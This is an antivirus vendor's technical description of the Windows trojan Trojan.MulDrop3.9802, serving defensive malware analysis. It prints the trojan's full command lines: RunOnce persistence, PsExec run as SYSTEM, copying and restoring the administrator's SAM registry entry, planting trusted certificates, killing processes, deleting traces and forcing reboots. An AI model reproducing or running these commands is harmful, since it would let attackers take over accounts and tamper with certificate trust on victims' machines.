Trojan.MulDrop3.9802

Added to the Dr.Web virus database: 2011-10-26

Virus description added: 2011-10-26

Technical Information

To ensure autorun and distribution:

Modifies the following registry keys:

[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] '192450' = '"%WINDIR%\Temp\ncmd.exe" exec hide cmd /c"echo. & cls "" & echo 192450>>"<Full path to virus>" & del /a /f /q "%WINDIR%\Temp\ncmd.exe""'

Malicious functions:

Creates and executes the following:

%WINDIR%\Temp\pse.exe -i -d -s "<Full path to virus>"
%WINDIR%\PSEXESVC.EXE
%WINDIR%\Temp\ncmd.exe exec hide cmd /c"echo. & cls "" & del /a /f /q "rst*" & set "K1=HKLM\SAM\SAM\Domains\Account\Users" & (if ~$currdate.yyMMdd$ lss 120116 call set "K1=%K1%\000001F4") & (if ~$currdate.yyMMdd$ geq 120116 еxit) & call reg query "%K1%+" || (call reg copy "%K1%" "%K1%+") & call reg restore "%K1%" "ncmd.k01" & set "K2=HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates" & set "K3=\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847" & set "K4=\F1EF7910E4B0356A86DBC4EDE0AE7EECFE81810C" & call reg add "%K2%%K3%" & call reg restore "%K2%%K3%" "ncmd.k02" & call reg add "%K2%%K4%" & call reg restore "%K2%%K4%" "ncmd.k03" & ncmd killprocess "~~$sys.sfxname$" & ren "pse.exe" "~d%RANDOM%.tmp" & ncmd exec show ncmd exitwin reboot force & ren "ncmd.k*" "~d%RANDOM%.*tmp" & del /a /f /q "~d*.*tmp"" killprocess "cmd.exe" killprocess "regedit.exe" cmdwait 1031 exec hide rst exitwin reboot force exitwin reboot force exec show ncmd exitwin reboot force killprocess "~$sys.sfxname$" exec hide cmd /c"echo. & cls "" & ncmd killprocess "rst.exe" & del /a /f /q "rst*" & ncmd regsetval dword "HKCU\Software\Sysinternals\PsExec" "EulaAccepted" "1" & ncmd exec hide pse -i -d -s "~~$sys.sfxname$"" filldelete "cmd.*" shellcopy "~$nir.exefile$" "~$folder.nircmd$\rst.exe" noerrorui silent yestoall killprocess "rst.exe" regsetval sz "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" "~$currtime.HHmmss$" "~q~$nir.exefile$~q exec hide cmd /c~qecho. & cls ~q~q & echo ~$currtime.HHmmss$>>~q~$sys.sfxname$~q & del /a /f /q ~q~$nir.exefile$~q~q" exec hide pse -i -d -s "~$sys.sfxname$" regsetval dword "HKCU\Software\Sysinternals\PsExec" "EulaAccepted" "1"
%WINDIR%\Temp\rst.exe cmdwait 3598 exitwin reboot force

Executes the following:

<SYSTEM32>\reg.exe restore "HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847" "ncmd.k02"
<SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847"
<SYSTEM32>\reg.exe restore "HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F1EF7910E4B0356A86DBC4EDE0AE7EECFE81810C" "ncmd.k03"
<SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F1EF7910E4B0356A86DBC4EDE0AE7EECFE81810C"
<SYSTEM32>\reg.exe query "HKLM\SAM\SAM\Domains\Account\Users\000001F4+"
<SYSTEM32>\logonui.exe /status /shutdown
<SYSTEM32>\reg.exe restore "HKLM\SAM\SAM\Domains\Account\Users\000001F4" "ncmd.k01"
<SYSTEM32>\reg.exe copy "HKLM\SAM\SAM\Domains\Account\Users\000001F4" "HKLM\SAM\SAM\Domains\Account\Users\000001F4+"

Attempts to shut down the Windows operating system.

Modifies file system :

Creates the following files:

%WINDIR%\Temp\pse.exe
%WINDIR%\Temp\rst.exe
%WINDIR%\PSEXESVC.EXE
%WINDIR%\Temp\ncmd.k03
%WINDIR%\Temp\ncmd.exe
%WINDIR%\Temp\ncmd.k01
%WINDIR%\Temp\ncmd.k02

Deletes the following files:

%WINDIR%\Temp\~d10573.k03tmp
%WINDIR%\Temp\~d29590.tmp
%WINDIR%\Temp\~d10573.k02tmp
%WINDIR%\Temp\rst.exe
%WINDIR%\Temp\~d10573.k01tmp

Miscellaneous:

Searches for the following windows:

ClassName: 'StatusWindowClass' WindowName: ''
ClassName: 'Shell_TrayWnd' WindowName: ''
ClassName: 'EDIT' WindowName: ''

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial